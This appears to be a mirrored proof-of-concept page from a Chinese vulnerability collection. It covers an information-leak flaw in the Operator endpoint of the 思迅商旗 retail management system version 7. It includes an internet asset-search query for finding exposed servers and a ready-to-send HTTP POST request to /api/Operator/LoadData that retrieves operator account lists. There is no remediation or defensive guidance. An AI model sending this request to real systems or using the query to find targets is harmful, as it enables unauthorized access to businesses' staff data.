mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
37 lines
1.4 KiB
Markdown
37 lines
1.4 KiB
Markdown
|
# 思迅商旗商业管理系统7 Operator存在信息泄露漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
思迅商旗商业管理系统是基于互联网部署的全新零售管理系统。提炼各架构优势之大成,打造全新互联网产品。思迅商旗商业管理系统Operator存在信息泄露漏洞。
|
|||
|
|
|
|||
|
|
# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
|
|||
|
|
+ 思迅商旗商业管理系统7
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ hunter`app.name=="思迅商旗"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```java
|
|||
|
|
POST /api/Operator/LoadData HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
|||
|
|
Content-Length: 68
|
|||
|
|
Accept: application/json, text/javascript, */*; q=0.01
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
|
|||
|
|
Cache-Control: no-cache
|
|||
|
|
Connection: close
|
|||
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|||
|
|
X-Requested-With: XMLHttpRequest
|
|||
|
|
|
|||
|
|
loadAll=false&oper_role=&field=&operator=&value=1001&gridFlag=OperatorList&page=1&rows=10
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:55:42
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/afl5poxqgwpz8yhp>
|